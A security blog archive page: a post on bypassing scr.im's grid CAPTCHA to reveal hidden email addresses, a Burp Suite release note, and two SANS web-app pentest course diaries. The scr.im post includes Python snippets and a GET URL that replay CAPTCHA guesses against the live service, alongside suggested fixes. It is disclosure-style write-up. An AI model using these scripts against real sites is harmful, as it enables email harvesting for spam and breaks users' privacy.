Cатсн²² (in)sесuяitу / ChrisJohnRiley

Because we're damned if we do, and we're damned if we don't!


The secrets of scr.im

Update [12/10/2010]: Since writing this back in October 2009, I’ve written a Proof of Concept Python tool to exploit the vulnerabilities discussed. More information can be found here.

A few days back I was alerted to a new website offering a novel way to hide your email address online. It sounded interesting, so I headed over to the scr.im website and had a quick poke around. As you can guess, I’m a bit suspicious of these kinds of services, and web application security is what I do (at least recently). A few things really jumped out at me straight away regarding the site’s use of CAPTCHA.

Now I’m pretty sure a big portion of people reading this are already saying WTF just by looking at the above screenshot. This is not the way to use CAPTCHA. For a visitor to the site this is nice and quick; for a script, however, it’s just a matter of playing the odds. The correct CAPTCHA has to be one of the 9 possible links displayed, which gives far better odds than attempting to crack the CAPTCHA itself. If the selected link is incorrect, the CAPTCHA screen can be reloaded (with new CAPTCHA options, of course) and you can try again. Sure, for a human it’s tedious; it took me 11 tries to get through by simply always selecting the first CAPTCHA option (top left corner, Y9VJJ in the above screenshot). For a scripted attack, however, this is a no-brainer and shouldn’t take more than a few seconds. There doesn’t seem to be any timeout, lockout or other protection to prevent this kind of attack; the page reload is the only real bottleneck.
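Out of curiosity, the odds of that manual retry approach can be sketched with a quick simulation (success per page load is 1 in 9, a geometric distribution, so around nine loads on average; my 11 tries were just mildly unlucky):

```python
import random

def average_page_loads(options=9, trials=100_000, seed=1):
    """Always click the first of `options` CAPTCHA choices and reload on
    failure; return the average number of page loads until success."""
    rng = random.Random(seed)
    total = 0
    for _ in range(trials):
        loads = 1
        # each reload reshuffles the grid, so the first option is
        # correct with probability 1/options
        while rng.randrange(options) != 0:
            loads += 1
        total += loads
    return total / trials
```

Running this converges on roughly 9 page loads per harvested address, which a script can burn through in seconds.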

The above solution was too messy for me, and I hate nothing more than constantly clicking buttons; it bores me. So how can we do the same thing more effectively, with less overhead? By taking a look at the scrim.js JavaScript you can see how the CAPTCHA buttons translate directly into POST requests. Although the value of the CAPTCHA is obfuscated, the code is simple enough to understand if you use Burp Suite to capture and examine the requests and responses. The Burp screenshot (left) shows the POST request that sends the CAPTCHA together with a token number and some other information. Initially I thought this token value was a replay-prevention measure; however, by capturing all 9 possible POST requests from a simple scr.im page (using Burp, naturally), I found that you could send each request in sequence to the remote server until the correct CAPTCHA is found and the desired email address is returned.
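In rough Python (stdlib only; the field names here are read off the Burp capture and may not match the live service exactly), that replay loop might look like this:

```python
import urllib.parse
import urllib.request

def build_post_body(captcha, token):
    """Encode one captured CAPTCHA guess as a form body.
    Field names are taken from the Burp capture (hypothetical)."""
    return urllib.parse.urlencode({
        "captcha": captcha,
        "action": "view",
        "token": token,
        "ajax": "y",
    }).encode()

def replay_guesses(url, captchas, token):
    """Send each of the nine captured guesses in turn until a response
    contains an '@', i.e. the hidden email address was revealed."""
    for guess in captchas:
        with urllib.request.urlopen(url, data=build_post_body(guess, token)) as resp:
            body = resp.read().decode(errors="replace")
        if "@" in body:
            return guess, body
    return None, None
```

With at most nine requests per page, the whole "CAPTCHA" falls to a simple loop.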

As with many web applications, the POST method isn’t strictly enforced on the server side. As such, you can easily change this to a single GET request (e.g. http://scr.im/test?captcha=46UU8&action=view&token=e6f0006403ab0c714034f25bc571aa93&ajax=y), which makes things a little easier when scripting a solution.
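Building that GET request in a script is then trivial (parameter names copied from the observed request; the token would still need to be scraped from the page first):

```python
import urllib.parse

def build_view_url(slug, captcha, token):
    """Recreate the CAPTCHA check as a single GET URL.
    Parameter names mirror the captured POST request."""
    query = urllib.parse.urlencode({
        "captcha": captcha,
        "action": "view",
        "token": token,
        "ajax": "y",
    })
    return "http://scr.im/%s?%s" % (slug, query)
```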

The screenshots below show the responses from the scr.im server (both negative and positive).

 

scrim negative response

scrim positive response

As most of the heavy work is done client-side using JavaScript (obfuscation of the CAPTCHA value, etc.), I don’t think it would take much for a good scripter (that rules me out, most likely) to write something that could quite simply go through and harvest addresses from the site. Normally this wouldn’t surprise me much, as spammers are harvesting emails all the time from various sources. However, scr.im is positioning itself as a way to “… protect your email address before sharing it, so only real people will use it …” That’s a problem, as most people will blindly assume the service must be secure.

Don’t get me wrong here, the idea is sound, and I’d really like to use something like this myself under certain circumstances (not for my primary accounts, but for some things certainly). So what can be done to fix things up .:

  • Add protection to prevent multiple options from being selected from the same CAPTCHA grid (one-time token) *
    • Resolves: The possibility of selecting ALL 9 CAPTCHA options and scraping the responses
    • Issue: Doesn’t stop an attacker reloading and trying again
  • Add protection to stop more than X number of requests per URL, per second/minute *
    • Resolves: Brute-Force style attacks, automated attacks (to some extent)
    • Issue: Could cause DoS against people’s links
  • If the wrong CAPTCHA is selected X times, revert to traditional CAPTCHA entry *
    • Resolves: Brute-Force style attacks, automated attacks
    • Issues: Same issues as traditional CAPTCHA, breakable

* Won’t prevent all possible attacks if implemented alone
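The per-URL request cap in the second suggestion is essentially a sliding-window rate limit. A minimal sketch of the idea (the limit and window values here are arbitrary examples, not anything scr.im actually uses):

```python
import time
from collections import defaultdict, deque

class RateLimiter:
    """Allow at most `limit` requests per URL in any `window`-second span."""

    def __init__(self, limit=10, window=60.0):
        self.limit = limit
        self.window = window
        self.hits = defaultdict(deque)  # url -> timestamps of recent requests

    def allow(self, url, now=None):
        now = time.monotonic() if now is None else now
        q = self.hits[url]
        # discard hits that have aged out of the window
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True
```

Combined with a one-time token per CAPTCHA grid, even a crude limit like this pushes a scripted harvest from seconds into hours or days.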

By mixing and matching the above solutions the attack vectors could easily be reduced, but never completely removed. With the 3×3 grid CAPTCHA there is always that 1-in-9 chance of the attacker choosing the correct CAPTCHA on the first try. Given these odds, a single attacker could (in theory) harvest 11.11% of email addresses on the first attempt purely by guessing (even with the above restrictions implemented). Depending on how/what protections are implemented, the attacker could then come back 8 more times (within minutes, hours or days) to scrape the remaining addresses. There will certainly be email addresses left unscraped, but for a spammer this isn’t a big issue.

With this in mind, the only workable solution is to alter the way CAPTCHA protection is implemented to go with the more traditional “typing” option. It’s tried and tested, and although it’s not perfect, it does resolve a number of the issues faced by scr.im currently.

Disclaimer: I’m not a developer, and I have the utmost respect for those who take time to put up services like this online. Hopefully people can learn from what I’ve explained here, so we don’t all make the same mistakes next time.

New Burp Suite

The blog over at blog.portswigger.net has been buzzing for the last month about the new version of Burp Suite. After a short time in beta testing (with users of the professional version) it’s been released for those using the free version. I’ve had a quick look over the features and think that version 1.2 is a big step in the right direction.

I’ve flitted back and forth between OWASP’s WebScarab and Burp Suite. As much as I’ve always wanted to go the free route and use WebScarab, something kept pulling me back to Burp. I guess it just makes things easier. The new version seems to fill in some gaps, and I’ll be looking at the pro license soon to really get the full benefit.

The professional version includes the new Burp Scanner (passive and active scanning), which seems to fill a void a lot of people have been looking to fill: an affordable web application scanner that actually works. No automated scan will find everything, but users of Burp Suite already know that, so the addition of a scanner just makes sense at this point. One thing I wish was in the free version, however, is the save/restore session function. Then again, I can see why this is held back for the paying customers.

Some of the new features include .:

  • Site map showing information accumulated about target applications in tree and table form
  • Fully fledged web vulnerability scanner [Pro version only]
  • Suite-level target scope configuration, driving numerous individual tool actions
  • Display filters on site map and Proxy request history
  • Ability to save and restore state [Pro version only]
  • Suite-wide search function
  • Support for invisible proxying

Check out the full details at www.portswigger.net

SANS Web App Penetration Testing and Ethical Hacking Class – DAY 4


DAY 4:

Today was a long day… my tip for a SANS conference in Europe: never go drinking with Terry Neal. No, seriously, save yourself before it’s too late ;) Still, it’s amazing what you can accomplish on 4 hours of sleep.

Today was finally the Exploitation day… and as we know, exploitation is always the fun part (insert evil laugh here). The coverage of a WordPress vulnerability from last year was interesting, but needed a little more in-depth explanation of how it functions. Due to the limited class running time, though, I don’t think that was really a possibility. Still, consider it homework ;) Although one lab was designed to cover blind SQL injection, the use of a pre-written script for it was a little disappointing. I’d like to have seen something with SQLBF or SQLmap personally.

The section on advanced script injection covered a lot of what I came to the course for. If I had a choice, the whole 4 days would have been at this level. At the very end of the day we looked at a couple of exploitation frameworks (Attack API, BeEF and XSS Proxy). I’ve not had a chance to play with these much before, so it was good to get some hands-on time with the tools, although I would have liked to look more at the Attack API setup and configuration. BeEF looks good, but lacks some functions that would improve its usefulness. Given the chance I’ll write up some modules to fill the gap.

Overall the course was enjoyable, although a little basic for people already doing web-app testing on a regular basis. I’m looking forward to seeing how the SEC:542 course changes when it goes to 6 days (see next year’s conference lists). I’m expecting something special from the InGuardians guys.

SANS Web App Penetration Testing and Ethical Hacking Class – DAY 3


DAY 3:

Well, day 3 has begun, and we’ve passed the halfway mark. I’m expecting some serious in-depth parts over the next 2 days. The presentations last night were really interesting. Raul covered Bluetooth attacks, which was interesting on a number of levels. Some people attending didn’t seem to get it from a business point of view. The opinion of one person was that the manufacturers won’t make a more secure version of these devices because it would cost more, and therefore not gain enough market share to be effective. A typical argument against security. What he failed to understand was that this is a business problem. As nasty as it is to have your conversations listened to, the real return on investment for attackers lies in attacking businesses. Therefore businesses need to demand the extra level of security for their Bluetooth devices, even if it costs €5 more than a normal device. This will filter down to the cheaper handsets, headsets and other devices after a while, and secure even the lowest end of the market.

The second presentation covered NIC and graphics card firmware, and what can be done to attack and control the firmware in these devices. An eye-opener indeed, especially when you learn that infected firmware can use PCI-to-PCI communications to bypass your firewall entirely. It’s still a little beyond today’s attackers to use this avenue, but it’s well within the means of a large government or well-financed crime syndicate. Something to look out for in the future…

The day kicked off with some basics on user enumeration. The Burp Suite byte/word-level page comparison is interesting, and something I’ve used before for cookies, but not for comparing 2 server responses. We then covered the usual suspects: SQL injection (including blind SQL injection), Cross-Site Scripting and Cross-Site Request Forgery. The coverage of Web Services was a little sparse for my liking. We’re going to start seeing more of these in the wild during tests, and an in-depth overview with examples would have been nice. Still, you can’t have it all. I think we could have done with some more hands-on today, but hopefully we’ll cover some of that in tomorrow’s Exploitation day ;)
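That response-comparison trick for user enumeration can be roughly approximated outside Burp with Python’s difflib; the threshold below is an arbitrary illustration, not a Burp default:

```python
import difflib

def response_similarity(a, b):
    """Ratio in [0, 1] of how alike two response bodies are."""
    return difflib.SequenceMatcher(None, a, b).ratio()

def looks_different(baseline, candidate, threshold=0.98):
    """Flag a response that differs noticeably from the known-invalid
    baseline; on a login form this often hints the username exists."""
    return response_similarity(baseline, candidate) < threshold
```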
